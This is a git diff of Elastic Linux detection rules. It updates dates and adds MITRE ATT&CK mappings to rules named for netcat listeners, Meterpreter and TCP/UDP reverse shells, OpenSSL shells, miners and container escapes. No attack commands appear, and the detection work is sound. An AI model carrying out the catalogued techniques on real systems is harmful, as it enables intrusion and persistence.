b/rules/linux/execution_nc_listener_via_rlwrap.toml index 7e6e8f09bbf..48f29f64038 100644 --- a/rules/linux/execution_nc_listener_via_rlwrap.toml +++ b/rules/linux/execution_nc_listener_via_rlwrap.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,3 +128,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml index b094488daa9..5e3fa776b44 100644 --- a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml +++ b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,6 +111,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -128,3 +133,16 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1620" +name = "Reflective Code Loading" +reference = "https://attack.mitre.org/techniques/T1620/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_network_event_post_compilation.toml b/rules/linux/execution_network_event_post_compilation.toml index 42342789d2f..57187ffedd9 100644 --- a/rules/linux/execution_network_event_post_compilation.toml +++ b/rules/linux/execution_network_event_post_compilation.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,6 +135,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_perl_tty_shell.toml b/rules/linux/execution_perl_tty_shell.toml index fdf0986337e..01e048ff1de 100644 --- a/rules/linux/execution_perl_tty_shell.toml +++ b/rules/linux/execution_perl_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -130,6 +130,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml index c3d550b7b8b..267e8cb0ef4 100644 --- a/rules/linux/execution_potential_hack_tool_executed.toml +++ b/rules/linux/execution_potential_hack_tool_executed.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,3 +133,84 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.002" +name = "Password Cracking" +reference = "https://attack.mitre.org/techniques/T1110/002/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.002" +name = "Vulnerability Scanning" +reference = "https://attack.mitre.org/techniques/T1595/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/linux/execution_potentially_overly_permissive_container_creation.toml b/rules/linux/execution_potentially_overly_permissive_container_creation.toml index 69ded33a6ec..dd1099bb85a 100644 --- a/rules/linux/execution_potentially_overly_permissive_container_creation.toml +++ b/rules/linux/execution_potentially_overly_permissive_container_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,6 +122,11 @@ id = "T1609" name = "Container Administration Command" reference = "https://attack.mitre.org/techniques/T1609/" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -139,7 +144,6 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml index b89fc96dc27..dcfef99c872 100644 --- a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml +++ b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,6 +124,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -132,6 +137,16 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" @@ -141,7 +156,6 @@ reference = "https://attack.mitre.org/techniques/T1564/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index 9188badd565..6ea1de11b32 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,14 +88,36 @@ process where host.os.type == "linux" and event.type == "start" and user.id == " [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.008" +name = "Masquerade File Type" +reference = "https://attack.mitre.org/techniques/T1036/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml index 1f0801f42f1..bec9a7025f8 100644 --- a/rules/linux/execution_process_started_in_shared_memory_directory.toml +++ b/rules/linux/execution_process_started_in_shared_memory_directory.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,3 +128,16 @@ reference = "https://attack.mitre.org/techniques/T1059/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml index c8eff177979..b6bdfa7b727 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/15" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,6 +117,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" diff --git a/rules/linux/execution_remote_code_execution_via_postgresql.toml b/rules/linux/execution_remote_code_execution_via_postgresql.toml index 1cecb668514..177c05598ab 100644 --- a/rules/linux/execution_remote_code_execution_via_postgresql.toml +++ b/rules/linux/execution_remote_code_execution_via_postgresql.toml @@ -2,7 +2,7 @@ creation_date = "2022/06/20" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,3 +124,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml index a1fd996d20e..82295dbf93a 100644 --- a/rules/linux/execution_shell_evasion_linux_binary.toml +++ b/rules/linux/execution_shell_evasion_linux_binary.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -194,19 +194,31 @@ process where host.os.type == "linux" and event.type == "start" and process.exec [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_shell_openssl_client_or_server.toml b/rules/linux/execution_shell_openssl_client_or_server.toml index b57a9c5ebbe..5d19d5276d6 100644 --- a/rules/linux/execution_shell_openssl_client_or_server.toml +++ b/rules/linux/execution_shell_openssl_client_or_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -136,6 +136,16 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1573" +name = "Encrypted Channel" +reference = "https://attack.mitre.org/techniques/T1573/" + +[[rule.threat.technique.subtechnique]] +id = "T1573.002" +name = "Asymmetric Cryptography" +reference = "https://attack.mitre.org/techniques/T1573/002/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml index 71f6934441f..665394590e0 100644 --- a/rules/linux/execution_shell_via_background_process.toml +++ b/rules/linux/execution_shell_via_background_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/20" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,6 +129,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml index b1d6944dd41..86d6082bcbc 100644 --- a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml +++ b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -131,6 +131,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml index 26b891475de..460eaa351cf 100644 --- a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml +++ b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -131,6 +131,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -144,6 +149,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_shell_via_meterpreter_linux.toml b/rules/linux/execution_shell_via_meterpreter_linux.toml index 8e75039764d..4d45d18d00c 100644 --- a/rules/linux/execution_shell_via_meterpreter_linux.toml +++ b/rules/linux/execution_shell_via_meterpreter_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -144,3 +144,31 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1087/001/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/execution_shell_via_suspicious_binary.toml b/rules/linux/execution_shell_via_suspicious_binary.toml index ed5b8943ef7..5b6fc4511da 100644 --- a/rules/linux/execution_shell_via_suspicious_binary.toml +++ b/rules/linux/execution_shell_via_suspicious_binary.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -139,6 +139,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml index c8be644cd99..600e8165d13 100644 --- a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml +++ b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,6 +129,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml index 35f575a8b8e..4f6e3d3579b 100644 --- a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml +++ b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -137,6 +137,16 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -150,6 +160,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml index 19461e6ab6b..b40f0b00185 100644 --- a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml +++ b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,6 +132,11 @@ id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.015" +name = "Compression" +reference = "https://attack.mitre.org/techniques/T1027/015/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" diff --git a/rules/linux/execution_suspicious_executable_running_system_commands.toml b/rules/linux/execution_suspicious_executable_running_system_commands.toml index 880ff976e63..6bdc18fb314 100644 --- a/rules/linux/execution_suspicious_executable_running_system_commands.toml +++ b/rules/linux/execution_suspicious_executable_running_system_commands.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,6 +135,43 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = "https://attack.mitre.org/techniques/T1049/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_suspicious_mining_process_creation_events.toml b/rules/linux/execution_suspicious_mining_process_creation_events.toml index 30a5f83b43b..a1e246c63e2 100644 --- a/rules/linux/execution_suspicious_mining_process_creation_events.toml +++ b/rules/linux/execution_suspicious_mining_process_creation_events.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/08" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -120,3 +120,34 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml index a35ae4ec714..6438bae79a2 100644 --- a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml +++ b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,6 +108,11 @@ id = "T1609" name = "Container Administration Command" reference = "https://attack.mitre.org/techniques/T1609/" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -116,6 +121,26 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [[rule.threat.technique]] id = "T1611" name = "Escape to Host" @@ -129,6 +154,16 @@ reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" @@ -144,6 +179,46 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.013" +name = "XDG Autostart Entries" +reference = "https://attack.mitre.org/techniques/T1547/013/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/execution_system_binary_file_permission_change.toml b/rules/linux/execution_system_binary_file_permission_change.toml index c9804ea2744..f288223ac7d 100644 --- a/rules/linux/execution_system_binary_file_permission_change.toml +++ b/rules/linux/execution_system_binary_file_permission_change.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,3 +125,39 @@ reference = "https://attack.mitre.org/techniques/T1059/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + 